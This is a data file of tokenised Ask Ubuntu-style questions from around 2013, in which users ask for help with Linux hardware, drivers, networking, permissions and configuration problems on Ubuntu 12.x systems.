278209	getting an alcatel x230d connected	-- i 'm still working on getting updates with this -- i have an alcatel x230d supplied by o2 . it is a usb 3g modem . it has the following credentials in lsusb : bus 003 device 003 : id 1bbb : f017 t & a mobile phones when tailing /var/log/syslog i see the the following : usb 3-2 : new high-speed usb device number 5 using xhci_hcd usb 3-2 : new usb device found , idvendor=1bbb , idproduct=f017 usb 3-2 : new usb device strings : mfr=3 , product=2 , serialnumber=4 usb 3-2 : product hspa data card usb 3-2 : manufacturer : usbmodem usb 3-2 : serialnumber : 1234567890abcdef scsi9 : usb-storage 3-2:1.0 mtp-probe : checking bus 3 , device 5 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-2 mtp-probe : bus : 3 , device : 5 was not an mtp device kernel : [ xxxxx.xxxxxx ] scsi 9:0:0:0 : direct-access alcatel mass storage 2.31 pq : 0 ansi : 2 kernel : [ xxxxx.xxxxxx ] scsi 9:0:0:1 : cd-rom alcatel mass storage 2.31 pq : 0 ansi : 2 kernel : [ xxxxx.xxxxxx ] sd 9:0:0:0 : attached scsi generic sg1 type 0 kernel : [ xxxxx.xxxxxx ] sd 9:0:0:0 : [ sdb ] attached scsi removable disk kernel : [ xxxxx.xxxxxx ] sr0 : scsi-1 drive kernel : [ xxxxx.xxxxxx ] sr 9:0:0:1 : attached scsi cd-rom sr0 kernel : [ xxxxx.xxxxxx ] sr 9:0:0:1 : attached scsi generic sg2 type 5 usb_modeswitch : switching device 1bbb : f017 on 003/005 i 've tried following this suggestion : http : //askubuntu.com/a/131331/212 which did nothing . i 've tried using the `` binary free '' and the amd64 versions of the script at http : //www.sakis3g.org , both of which identify the `` hspa data card '' , and both state `` failed to connect . '' i 've turned on advanced logging in /etc/usb_modeswitch.conf ( enablelogging=1 ) the pertinent details ( i believe ) are here : extracting config 1bbb : f017 from collection /usb/share/usb_modeswitch/configpack.tar.gz config : targetvendor set to 1bbb config : targetproduct set to 0017 driver module is `` option '' , id path is /sys/bus/usb-serial/drivers/option1 ! matched , now switching command to be run : /usr/sbin/usb_modeswitch -i -w -d -s 20 -c /run/usb_modeswitch/current_cfg -u 1 -v 1bbb -p f017 2 > & 1 < snip > * usb_modeswitch : handle usb devices with multiple modes * version 1.2.3 ( c ) josua dietze 2012 * based on libusb0 ( 0.1.12 and above ) defaultvendor= 0x1bbb defaultproduct= 0xf017 targetvendor= 0x1bbb targetproduct= 0x0017 targetclass= not set targetproductlist= '' '' < snip > looking for target devices ... searching devices , found usb id 1bbb : f017 found matching vendor id no devices in target mode or class found looking for default devices ... searching devices , found usb id 1bbb : f017 found matching vendor id found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 005 on bus 003 skipping the check for the current configuration using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) < snip > looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached setting up communication with interface 0 using endpoint 0x01 for message sending trying to send message 1 to endpoint 0x01 ok , message successfully sent resetting response endpoint 0x81 resetting message endpoint 0x01 checking for mode switch ( max . 20 times , once per second ) ... searching for target devices ... searching devices , found usb id 1bbb : f017 found matching vendor id searching for target devices ... searching devices , found usb id 1bbb : f017 found matching vendor id < snip > searching for target devices ... searching devices , found usb id 1bbb : f017 found matching vendor id no new devices in target mode or class found mode switch has failed . bye . i have noticed this entry : alcatel x500 datacard wo n't recognize on ubuntu 12.04 using xhci which suggests that there may be an issue with xhci , however , unlike this person , i am unable to disable xhci in my bios on my acer v5-171 . so ... . i did some more digging after posting this , and found this link : http : //www.draisberghof.de/usb_modeswitch/ # contrib i found a suitable windows xp machine , ran the usb sniff application mentioned in that page , and ( eventually - i 'll blog this at some point ) got this data : [ 196 ms ] > > > urb 5 going down > > > -- urb_function_bulk_or_interrupt_transfer : pipehandle = 864fedf4 [ endpoint 0x00000001 ] transferflags = 00000002 ( usbd_transfer_direction_out , usbd_short_transfer_ok ) transferbufferlength = 0000001f transferbuffer = f7911184 transferbuffermdl = 00000000 00000000 : 55 53 42 43 78 56 34 12 01 00 00 00 80 00 06 06 00000010 : f5 04 02 52 70 00 00 00 00 00 00 00 00 00 00 urblink = 00000000 according to this walk-through : http : //blogger.ziesemer.com/2008/10/alltel-um175al-usb-evdo-ubuntu.html you take the value from the pipehandle endpoint , and that 's the messageendpoint value ( 0x01 ) plus the long value after transferbuffermdl which is the messagecontent . this gives me a usb_modeswitch.conf entry of this : defaultvendor = 0x1bbb defaultproduct = 0xf017 messageendpoint = 0x01 messagecontent = 55534243785634120100000080000606f50402527000000000000000000000 however , running sudo usb_modeswitch -c usb_modeswitch.conf i get looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 023 on bus 003 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached and there it stays ... ok ... so it turns out , i might have jumped the gun a little . i unpacked /usr/share/usb_modeswitch/configpack.tar.gz and updated 1bbb : f017 with the new settings . i unplugged and re-plugged the device , and while it took a little time to come up , eventually ... it worked ! so , i 'll be filing a bug with the usb_modeswitch project to get this new message added to their distribution . update after submitting the bug to usb_modeswitch . turns out all of the above is pointless . the existing config file does work , but you need to run it through a couple of times manually . i 'm just waiting on feedback from the guys over at usb_modeswitch to get some ideas on fixing this up !
278225	use arandr keybindings without metacity ?	i use the arandr program ( a gui on top of xrandr ) to switch between various monitor layouts quickly and easily . i find its less buggy than ubuntu 's displays application . one of the features of arandr is to bind keyboard keys ( e.g . crtl-shift-d ) to various layouts to make switching between them easier . it warns that these key bindings only works if your window manager uses them , which metacity does , and apparently compiz does not . anyway to get these to work in compiz ?
278227	pro evolution soccer 2013 via wine on ubuntu 12.10	i 've tried installing pes 2013 via wine . it worked , the installation process is finished . the game does n't run correctly . the game reads my vram as 128 mb , mine is 512 mb . i think i must install the drivers or something so it reads it correctly ? when i run the game it crashes with a weird error . edit : after installing wine 1.5.27 the game does n't crash , instead it keeps loading , but nothing happens . i think the whole problem is with my graphics card , it 's read as 128 mb instead of 512 mb . how to install the proper graphics drivers ?
278232	i have a ip adrs on my network defined as my dmz server , but there is no server there , keep getting requests	i have a ip adrs on my network defined as my dmz server , but there is no server there ... .i keep getting connection requests to the dmz in my router logs ... is this bad or good ?
278233	how to support converged device layout changes ?	i 'm interested in developing some applications for ubuntu , using the sdk , for converged devices , including phones , tablets , and pcs . how can i detect which device the application is running on , and apply the appropriate layout , including interactivity differences , correctly ?
278238	openvpn on ubuntu openvz	i finished configuring openvpn on my openvz vps . when i run service openvpn restart i get the following error output : * stopping virtual private network daemon ( s ) ... * no vpn is running . * starting virtual private network daemon ( s ) ... * autostarting vpn 'client' * autostarting vpn 'server ' siocsifaddr : no such device : error while getting interface flags : no such device siocsifdstaddr : no such device : error while getting interface flags : no such device siocsifmtu : no such device i have a gut feeling that it is something to do with the fact that an openvz machine does not have an eth0 device but a venet0:0 interface instead . i looked through all the config files i had to edit and made sure there was no reference to eth0 though . i configured it to this tutorial that i am finishing up ( will be finished once i have the solution from here ) . please let me know how i need to change my configuration so that openvpn can start successfully .
278241	wallpaper settings via nitrogren are lost after rebooting ?	i use nitrogen to set a different wallpaper for each monitor . it requires disabling of the nautilus desktop , but works great . until i reboot ... at which point the settings are lost and i go back to the default gnome wallpaper which is the same on both monitors . anyway to make the nitrogen settings stick ?
278243	gnome 3 not showing up , just looks like original gnome , plus 1 panel is not working . not gnome classic	i 've opened a random application to show that it 's not showing up on the bottom panel . yes , i have tried win+alt , right click and add to panel , windows list ( and also windows switcher ) but neither make any difference . i 've tried removing the panel , re-adding it etc too . i 've tried this to ensure i was n't missing any packages . i am logged in with `` gnome '' , not gnome classic . anybody have any ideas ? edit : i 've updated and upgraded the gnome3 ppa , and reinstalled gnome-shell . help ! also , probably related , when i try opening gnome packages such as boxes it throws up an error saying it crashed and would i like to relaunch , also update-notifier which i had n't tried to open .
278247	installed 12.04 lts onto external hard drive , will not boot	i went ahead and figured out how to install onto my external hdd using a cd to do it . the install went fine , and i made 3 partitions . one of 500mb , ext4 , /boot . another of about 200gb ( was n't sure how much space would be needed ) , ext4 , / . and the third at 4000mb as a swap area . the install finished and asked me to reboot and remove the disk from the drive so it could boot from the usb . i did as it said , and it does n't boot up . it goes to a black screen immediately after trying to boot , and sits there . i left it for about half an hour and decided just to force a shutdown and try again . this did n't work either . it 's done this a couple times now , and i have n't been able to get anywhere with it to get into ubuntu . if the drive is n't connected , i can load windows fine , so i 'm assuming i installed grub into the correct place . i got the 64bit version of the software since my computer supports it ( currently running windows 8 64bit ) any help would be greatly appreciated i did see something about using boot-repair , but i ca n't get anywhere to do that . below is everything cpuz says about my system in case it 's necessary . thanks to mitch for posting the picture for me this is the guide i followed for installation . edit : i tried formatting the external and reinstalling , and am still running into the same problem
278248	mounting ntfs drives with different permissions for various users	i have three physical ntfs drives on my machine ( apart from ssd where ubuntu is installed ) . currently i use pysdm to auto mount them , although i 'm not quite happy how it does it . i also have three users of my computer ( me - val , joe , and mary ) , and i want them to have different access rights to ntfs volumes . now i plan to try ubuntu 13.04 when its released , and i know that as of 12.10 pysdm is deprecated . my question is : how should i edit fstab ( or anything else ) to achieve the following : ntfs1 : bootable at start , full access ( r/w ) to all three users . ntfs2 : bootable at start , accessible r/w to me ( val ) and r/o to user joe . ntfs2 : bootable at start , accessible r/w to me only , and ideally invisible to other users ( joe and mary ) .
278252	regain access to root after setting the shell to /sbin/nologin	i edited the file /etc/passwd on my server in the following way : root : x:0:0 : root : /root : /sbin/nologin now i can not login as root . when i enter the su command , can not execute /sbin/nologin : no such file or directory is displayed in console . i have no physical access to the server . i have no users in the sudoers file . can you please help me to log in as root ?
278255	how can i display mounted partitions in unity ( ubuntu 12.10 )	i have a couple of mounted volumes ( under /media and ~/ ) , but neither of which will ever display on my unity bar . i do however see both volumes listed in nautilus . what 's interesting is that no partitions display on my unity launcher whatsoever ( no iphone , disc , usb storage , etc. ) . i know you can also blacklist the uuid of a volume from displaying , but none of these items are blacklisted . how can i go about fixing this ? thanks !
278257	removing ms office 2007 icons from the dash	i 'm an ubuntu noob and tried to install ms office in wine , but could n't get it to work . so i removed office but the icons are still in the dash . when i try to right click them it says nothing . any suggestions ?
278274	how i can change background color of query editor in workbench ?	i have dark gui , but how i can make text editor also dark ? i am under lubuntu , workbench from repositories .
278284	is there a driver for canon mf4800 ?	i am using ubuntu 12.10 32-bit . the machine detected the network printer canon mf4800 , but it can not find a driver . the screen prompts for a driver . i selected canon but i can not find the the series of my printer . i went to the canon website and searched for a linux driver but drivers are not not available for the linux os .
278286	struggeling with nvidia dualscreen	i have a gtx550 ti in my pc and xubuntu 12.10 . i installed the newest driver from nvidia 's website and everything works fine . except for one thing . i have two screens , a small crt one and a big lcd one . the small crt is to the left of the big lcd . the big lcd needs to be the primary . this seems impossible : before i login this actually works : small one is to the left , big one to the right , big one is primary . but after login its always the other way around : big is left and primary , small is right and secondary . with nvidia-settings i tried to put everything like i need it , but it always makes the left screen primary and it never saves anything , no matter what i do , so after re login everything is gone anyway . i save to the xorg.conf file every time , press apply every time , nothing works . how can i put everything the way i want it ?
278288	how can i delete a directory on a smb share ?	i have an external hdd mounted as a smb share ( via a iomega iconnect ) , however i ca n't delete a directory on it : permission denied looking at properties : the permissions of `` abc '' could not be determined i navigated to it in terminal via .gvfs but when i use chmod 777 -r . for each file i get : operation not supported . how can i delete this directory ? i 'm deleting a large directory and 99 % of files deleted ok , just not along one particular path . sudo rm -rf `` abc '' gave : rm : can not remove `` abc '' permission denied . i can copy to and remove files from elsewhere on the disc
278294	i play video games alot but i want to be able to use ubuntu for my surfing needs ( for the security )	i use windows 7 ( 64bit ) currently but i wonder what would be the most effective way to switch to ubuntu for the web surfing ( youtube mostly ) ? should i dual boot ? ( ugh but the restarts ) what about virtual space ? ( how much does virtual space suffer in speed ) should i keep windows 7 as the main and then use virtual for ubuntu or ubuntu ( main ) and windows ( virtual ) ? some little facts : im almost a total newbie to practical computer use but not to theory so i should understand most lingo . i plan on building a pc with a higher end i7 processor to lessen the effects of question 1 .
278295	ati - problems with open drivers after fglrx remove	i have ubuntu 12.04 and kde 4.10.1 . i have removed fglrx drivers 13.1 doing this : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* i have also removed xorg.conf ( it was in a guide ) sudo rm /etc/x11/xorg.conf and then i did sudo dpkg-reconfigure xserver-xorg after reboot i have kde plasma-desktop crash every time and the resolution is 1280x1024 but my maximum right resolution is 1920x1080 and i ca n't change it in kde settings menu . i can not use opengl in kde effects menu and so no effects . same resolution problem with any other desktop ( unity 3d/2d and gnome classic ) . the output of glxinfo | grep render direct rendering : yes opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) gl_nv_conditional_render , gl_amd_draw_buffers_blend the output of : glxinfo | grep -i opengl opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) opengl version string : 2.1 mesa 9.0 opengl shading language version string : 1.20 opengl extensions : here is my xorg.0.log : http : //pastebin.com/raw.php ? i=mpxed99w i have also added ppa `` ubuntu-x-swat/x-updates '' and upgrade my system , but it did not solve the problem . my machine specs : gpu : msi/ati r6870 hawk cpu : i5-2500k sandy bridge motherboard : p8p67 pro please help , thanks
278299	no device file for partition in /dev/	i did partition /dev/sda1 using fdisk . after creating two partitions , saved the table . and rebooted the server . but there is no device file present for new partitions . : ~ $ sudo fdisk -l disk /dev/sda : 32.2 gb , 32212254720 bytes 255 heads , 63 sectors/track , 3916 cylinders , total 62914560 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007fd94 device boot start end blocks id system /dev/sda1 * 2048 60817407 30407680 83 linux /dev/sda2 60819454 62912511 1046529 5 extended /dev/sda5 60819456 62912511 1046528 82 linux swap / solaris : ~ $ : ~ $ sudo fdisk -l /dev/sda1 disk /dev/sda1 : 31.1 gb , 31137464320 bytes 255 heads , 63 sectors/track , 3785 cylinders , total 60815360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1bec54ef device boot start end blocks id system /dev/sda1p1 10485760 60815359 25164800 83 linux /dev/sda1p2 2048 10485759 5241856 83 linux partition table entries are not in disk order : ~ $ : ~ $ sudo parted -l model : vmware , vmware virtual s ( scsi ) disk /dev/sda : 32.2gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 31.1gb 31.1gb primary ext4 boot 2 31.1gb 32.2gb 1072mb extended 5 31.1gb 32.2gb 1072mb logical linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : /dev/sr0 : unrecognised disk label i am using ubuntu 12.4 linux on vmplayer .
278301	terminal hangs on `` do you want to continue [ y/n ] ? y ''	i am running an install on ubuntu 12.10 . in the terminal i enter : gksudo apt-get install < package > i am then prompted : after this operation , 4,789 kb of addition disk space will be used . do you want to continue [ y/n ] ? i answer : y terminal then appears to hang . i have waited more than 10 minutes . please advise
278305	hybrid 7 irc server : how can i set a server password ?	i 'm running a small irc server on ubuntu 12.10 using ircd-hybrid and i 'm having a few issues setting a password for the server ( setting a channel password works fine ) , i have tried setting the `` password '' in the user auth { } section in the ircd.conf configuration file , but when ircd-hybrid is restarted i ca n't access the server at all ( i get the error message `` you are not authorised to use this server '' , i 'm using the password that gets generated by mkpasswd ( not running it as root , either - tried using -m md5 option as well without luck ) and i do n't know what the issue is ( i can connect just fine when the line is commented out ) . i 've attached some snippets from our ircd.conf file which should help . auth { user = `` * '' ; class = `` users '' ; /* restricted : stop the client sending mode changes */ # restricted = yes /* password to join server */ password = `` ( our pass here ) '' ; /* spoof users host */ ; spoof = `` client.net '' ; /* have ident : require the user has identd to connect ( old i : + flag ) */ have_ident = no ; } ;
278307	set default gpu for switchable ati/intel graphics	i am running quantal using the catalyst 13.3 ati driver for intel hd 4000/ati hd 7670m setup . i can switch between integrated and dedicated gpu with amdconfig -- px-igpu or amdconfig -- px-dgpu . upon reboot it 's always the dedicated card that is selected , so i have to switch manually again after boot and then restart x . is there a way to set the integrated gpu to be default ? this way i can switch to dedicated graphics when needed ( not very often ) .
278313	ubuntu wont install properly	i have successfully burned ubuntu to a disc but when i go to boot it from the bios , i get this error : /casper/vmlinuz : file not found . the installation menu comes up but no matter what option i select , i always get that error . anyone know how to fix this ?
278314	how to have packages ' rc config files deleted on package removal ?	yesterday i noticed the following when i started removing several apps i was not going to use . the file in the rc folders ( /etc/rc0.d , /etc/rc1.d ... . /etc/rc6.d ) associated with the deleted app were still there . for example , after removing gammut , the file /etc/rc0.d/k20gammu-smsd was still there . same for the following i found : motion - /etc/rc0.d/k60motion wicd - /etc/rc0.d/k20wicd hddtemp - /etc/rc0.d/k20hddtemp and so on . this also applies to other rc levels corresponding to the single user , multi user and shutdown levels . what do i need to do ( avoiding having to do it manually for each ) to remove any trace of the app .
278316	undefined reference to symbol dgemm cblas error	i am trying to compile a code package , which makes use of cblas and lapack . thus , after specifying the path of lapack and cblas in its makefile , when i try to make or compile , i get the following error undefined reference to symbol 'dgemm_' 'dgemm_ ' is defined in dso /usr/lib/libblas.so.3gf so try adding it to the linker command line if anybody has faced this error earlier , can you please tell me how to resolve it ? i tried to search and ended up here , http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=620434 i dunno if this is the right direction , but please help me out here . am just stuck , trying to compile few codes . the major thing i want to know is how to do this - 'dgemm_ ' is defined in dso /usr/lib/libblas.so.3gf so try adding it to the linker command line its just my thought , but will this solve the problem ? please help me .
278322	quickly tutorial section 4 will be availabe ?	quickly tutorial read to the end now that i have my package now that you have a package now that you 've packaged your application , you can share the .deb file . however , if your users install your application this way , and you update the application , your users will have to find this out and reinstall the newer version themselves . this hassle can be avoided in ubuntu by using personal package archives ( or ppas ) . distrubuting your applications in this manner is covered in section 4 ( not yet available ) . can someone help me to bring my package to my ppa ? there is `` get started '' but no `` get finished '' in this tutorial . : ( i 've created pgp , ssh keys signed code of conduct created ppa dput does n't work for me
278325	c time.h functions erratic on precise 12.04	i 'm running ubuntu 12.04 and using the gcc compiler to compile my c/c++ programs . i want to benchmark a function . afaik , there are two standard functions to calculate time on posix systems and both are showing erratic results on ubuntu : gettimeofday clock_gettime here is my code : int main ( ) { float msec=0 ; //struct timespec start , end ; struct timeval start , end ; //clock_gettime ( clock_monotonic_raw , & start ) ; //clock_gettime ( clock_realtime , & start ) ; gettimeofday ( & start , null ) ; get_height ( ) ; //function i want to benchmark /* usleep ( 1000000 ) ; */ //clock_gettime ( clock_realtime , & end ) ; gettimeofday ( & end , null ) ; //msec = ( end.tv_sec-start.tv_sec ) *1000 + ( end.tv_nsec-start.tv_nsec ) / ( float ) 1000000 ; msec = ( end.tv_sec-start.tv_sec ) *1000 + ( end.tv_usec-start.tv_usec ) / ( float ) 1000 ; printf ( `` % 0.2f ms.\n '' , msec ) ; //41-44 } the trouble is that the millisecond being displayed are showing erratic/different results each time the program is run . some sample readings are : 38.16 ms. 42.72 ms. 35.70 ms. 45.13 ms . however , when i test with the usleep ( ) function , the result shows 1000 ms. properly . any idea what library/function should i use to time my functions accurately ? edit : this is to further clarify that the said clock_gettime functions are only inaccurate on ubuntu 12.04 . i 've tested on other machines where it showed accurate results . even on windows , the equivalent query_performance_counter ( ) functions showed accurate results .
278328	how to acquire a remote host fingerprint that is not in known_hosts ?	ssh-keygen -l -f host will print out the key of a remote host , but only if the host exists in known_hosts.is it possible to request a fingerprint from a host that is n't in the known_hosts file ? ( without manual intervention such as connecting through ssh )
278336	failed to load session `` ubuntu-2d	i tried remotely connecting to ubuntu 12.04 from windows 7 using remote desktop manager . after installing xrdp , i was able to login but was not able to see any icon on my ubuntu desktop . even the right click does not work . this problem is same as referenced in the following link : blank desktop when logging in via xrdp to get rid of this problem , i followed the following steps : cd /home/youruser echo `` gnome-session -- session=ubuntu-2d '' > .xsession sudo /etc/init.d/xrdp restart but now , i am not even able to login the ubuntu system . it displays a message `` failed to load session `` ubuntu-2d '' . do n't know how to get rid of this problem . searched on internet but was not able to get any significant answer . thanks in advance for the help ! ! !
278337	random black boxes	these black boxes showed up after restarting my computer and they blink on and off . not sure where they came from and they occur before i login to my computer . i am running ubuntu 12.10 and i have a nvidia graphic card and had to disable the default graphic system that ships with ubuntu . if you need more information let me know . sorry that i used a picture of my screen , the boxes did n't show up on a screenshot .
278339	how to determine dpi size of a pdf & djvu	as the title says how would i determine the dpi of a pdf or a djvu document ? i am looking for a proper linux solution as opposed to running adobe acrobat professional under wine .
278344	problem installing fglrx drivers 13.1 with kernel 3.4 on ubuntu 12.04.02 x64	i have tried to upgrade from kernel 3.2 to kernel 3.4 ( here ) and after that installing fglrx drivers 13.1 ( compatible up to kernel 3.5 ) . here are the steps i followed : removing ( purging ) existing drivers sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* rebooted updated open drivers : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update & & sudo apt-get upgrade rebooted installed some dependencies and then tried to install fglrx drivers : sudo sh amd-driver-installer-*.run -- buildpkg ubuntu/precise sudo dpkg -i *.deb at this point the installation stuck at : update-initramfs : generating /boot/initrd.img-3.4.0-0304-generic nothing happens and i have to stop installation and i need to use dpkg-reconfigure -a . can you tell me how install kernel and fglrx drivers in the correct way ? do i need to know anything else to do that ? thanks
278347	how do i configure ufw to only allow outgoing/established connections for a ipv6 network ?	how do i configure ufw to only allow outgoing/established connections for a ipv6 network ? i am using an old computer with 12.04 installed to create an ipv6 router for my local network . i would like it to act as a firewall as well . i have a tunnel setup and working with hurricane electric and the computer is successfully routing traffic to and from the ipv6 internet . i have followed the instructions given at https : //wiki.ubuntu.com/ipv6 # configure_your_ubuntu_box_as_a_ipv6_router under the “ufw and routing” section . unfortunately , when i enable ufw , all connectivity is lost . i 'm also not sure what is meant by if you only want outgoing connections you also need to change default_forward_policy= '' drop '' does that mean change it to equal “drop” or change it to equal something else ? iptables -l http : //ubuntuone.com/0fu17qz5h3xqp3kp0hqmnf after.rules http : //ubuntuone.com/2pc1rzogididcgsej4spmo after6.rules http : //ubuntuone.com/7zoexant8oinuwu72dkesz before.rules http : //ubuntuone.com/520w8ehgyukdr4tr5rq3hr before6.rules http : //ubuntuone.com/5qeoz9eqaescqumjbitv2a sysctl.conf http : //ubuntuone.com/2in6k6abs07lewe6gc1pgg ufw.conf http : //ubuntuone.com/4p6riqqm3zaq6pbv30ad6t user.rules http : //ubuntuone.com/3s9vs1oz9sxgoxlxyjd0da user6.rules http : //ubuntuone.com/545d5g1g8w2lde6x5xaczx
278349	how to share a wireless connection through ethernet with fixed ip addresses ?	i have a macbook with ubuntu quantal running on it and i also have a device with a linux distro ( fyi , a raspberry pi* ) . i 've been trying to set up the device to share my laptop 's wireless connection through the ethernet port . the problem is that i do not want to allow the ip address of the device to change ( so i guess i do n't want to use dhcp ) , since it has no interface other than the ssh connection that i open from my ubuntu laptop . thus , the question is : how can i set up both ubuntu and the device to have it using ubuntu 's wireless connection through the ethernet cable , but without ever changing the ip address of the eth0 port in the device ? i do not want to change it because i 'd like to always be able to find it on the network without having to edit its filesystem in another machine ... * i think this problem is more related to ubuntu than to the raspberry pi , so i believe this is the right forum to ask this question .
278350	using windows 7 to access files on a ubuntu pc	i have a laptop that i 'm currently using to dual boot win 7 and ubuntu 12.10 . works great ... no problems with that part . i 've recently been given a couple of old hand-me-down dell pcs with moderately sized hard drives to do with as i see fit . as i 'm sure most of you know , more storage is always a good thing , so i was playing around with the idea of using these pcs as sort of an external storage drive or server . i have some other hard drives laying around and i was hoping to install ubuntu on one of the smaller ones , and then use the other two drives from the dell pcs purely as storage . i 'm relatively certain i could achieve that goal easily enough . my question is how would i go about connecting that `` new '' pc to my laptop in a way that windows could not only detect , but also read and write to those two extra hard drives ? i mostly want to fill those drives with my music collection to free up some space on my laptop 's drive ... and maybe back up some important files . so those extra drives would have to act as an external , basically . i 'd thought about turning the desktop into a local server.. which would serve the purpose of backing up my files , but i 'm not sure how storing music would work ... i also do n't really want to have to ftp everything to the drives .
278356	how to install fsme ?	i am looking to install fsme in ubuntu , how can i do that . the official doc looks beyond scope - http : //fsme.sourceforge.net/doc/install.html not sure what step 4 is telling..any suggestions please . ( i have installed qt4 )
278357	update postgresql with latest security update	postgresql announced on the 4th of april a security update to its postgresql server . i really want to install that update . but if i run sudo apt-get update and sudo apt-get upgrade the update does not show up . how can i install this update ? server : ubunutu 12.04 and postgresql 9.2.0
278360	conditional host file	i 'm working locally on a project and want to have some requests to a domain resolve to localhost and others just go where they normally would . i want to essentially do this in my hosts file : 86.75.3.09 www.example.com/dir/* 127.0.0.1 www.example.com as far as i understand , this is n't possible with /etc/hosts , but i could be wrong . nevertheless , i 'm open to suggestions . i 'm using apache and have tried using a proxy to send /dir/* requests to the real ip address of www.example.com , but then they ca n't resolve where i came fromâi need it to seem like i 'm accessing www.example.com by going directly to www.example.com . i.e. , this does n't do what i want in my site configuration : proxypass /dir/ https : //86.75.3.09/dir/ because then the foreign site thinks i 'm accessing it from 86.75.3.09 and not example.com .
278364	c and d 300 gb drives in one machine how to install on d and do dual boot ?	i have two 300 gb hard drives in the same pentium based machine - c and d. drive c is currently running windows 8 . i want to install ubuntu on drive d can i do that ? how would i select which drive ( os ) i want to boot from ? thanks !
278366	ubuntu 12.10 installation options	i got a 400 gb hard disk with 200 gb allocated to windows vista and 200 gb unpartitioned space . during the installation i selected `` install ubuntu alongside windows vista '' . then i clicked on install now but i was not given the choice of choosing the size of / , swap and home partitions . are the sizes automatically chosen for you ? thanks .
278368	how do i fix netflix requiring silverlight update ?	i 'm running ubuntu 12.04 lts 64-bit , which i installed using the original release ( not the newer 12.04.2 release ) , and have been successfully using netflix-desktop ever since the ppa : ehoover/compholio repository was made available . i never encountered any problems , whatsoever , until a couple of days ago . it appears that netflix now requires an update to silverlight , and i have been unsuccessful in updating silverlight with the patched wine being used for netflix-desktop . i 'm hoping an update will be available through the repository , mentioned above . until then , however , does anyone have a solution for upgrading silverlight ?
278370	can i use a custom shell with upstart script stanza ?	i 'm writing a few daemons implemented in pure shell script and would like to use zsh ( powerful substitutions , modules with socket/tcp handling , etc ) instead of the default /bin/sh . can i tell the 'script ' stanza to use a custom shell ?
278374	i want to add background color to vimrc but it 's not working	i am forced to run this in my vim editor everytime i work . highlight normal ctermfg=grey ctermbg=black what i want is for this to be automatic , i already have background set to dark but nothing is happening in vimrc . what should i do ? vimrc contents ( first few lines ) syntax on set background=dark set ruler `` show the line number on the bar set more `` use more prompt set autoread `` watch for file changes set number `` line numbers thanks .
278384	how can i mark all packages with installed dependents as `` automatically installed '' ?	there are some similar questions , but here is precisely what i would like to achieve and the dots which i am having trouble connecting : query a list of `` manually installed '' packages ( apt-mark showmanual works ) check each package for installed dependents mark each such package as `` automatically installed '' ( apt-mark auto < pkg ... > works ) so i think my command will look something like : apt-mark showmanual | < esoteric apt/bash magic > | apt-mark auto - would that be correct ? related questions how do i find which packages could be set as automatically installed ? why are almost all packages marked as manually installed ? ( see also https : //bugs.launchpad.net/ubuntu/+source/livecd-rootfs/+bug/424643/comments/26 )
278387	how to get rid of whitespace around image file ?	i could not delete the extra white space around a .eps file in ubuntu 12.04 . i have done the same , using the command fixbb < inputfile.eps > < outputfile.eps > in earlier versions but in this version , whenever i try , i get the messeage fixbb : command not found .
278400	problem restoring android after trying ubuntu on nexus 7	i tried ubuntu on my nexus 7 , and i now want to restore android on it . i made the procedure described , in https : //wiki.ubuntu.com/touch/install and the ubuntu flash worked well . but when i want to restore android , the nexus 7 is n't detected by fastboot anymore . everyone 's talking about drivers problems , but since i successfully flashed ubuntu on the nexus , i assume to have the fine drivers . i tried on windows too , and the nexus is n't recognized . i made a wipe data/factory reset , then my nexus do n't have a system anymore , and all i can do is stay in bootloader but my nexus is n't recognized . i ca n't flash anything if the tablet is n't recognized . do you know what can cause the fact that my tablet is n't recognized after having flashed ubuntu . i am on ubuntu 12.10 , and tried several usb cables . further info : lsusb returns nothing : z $ lsusb [ 13-04-08 23:46 ] bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 13d3:5122 imc networks bus 002 device 003 : id 046d : c52e logitech , inc. still , a unkown device is seen on windows ... still searching the whole internet for a clue , but anyone seems to have the same problem ... seems like it has destroyed my sweet nexus = ( any clue would be greatly apreciated . thanks by advance
278401	is ubuntu touch created in c++ ?	the reason i ask is because c++ is more efficient . since ubuntu sdk provides python for quicker programing but will it be more efficient than c++ and does ubuntu provide a virtual machine for ubuntu phone or will it be direct to machine code as c++ because it would be more efficient and especially easier integration with regular ubuntu .
278402	what is the default configuration for the xfce menu ?	i accidentally messed up my xfce-applications.menu file in /etc/xdg/menus ... .. : ( does anyone know what the default configuration is for this file ? let 's hope i learn my lesson of messing with the original file ...
278403	how do you make usb bootable on chromebook	i have a chromebook series 5 . i want to install ubuntu onto a usb stick . when i downloaded ubuntu onto my usb stick , it wo n't start up . do i first have to download ubuntu onto my chromebook hard drive , open ubuntu and then make usb stick bootable ? and then return back to chrome ? or is there a way to download directly onto usb and make the stick bootable ? i appreciate any help .
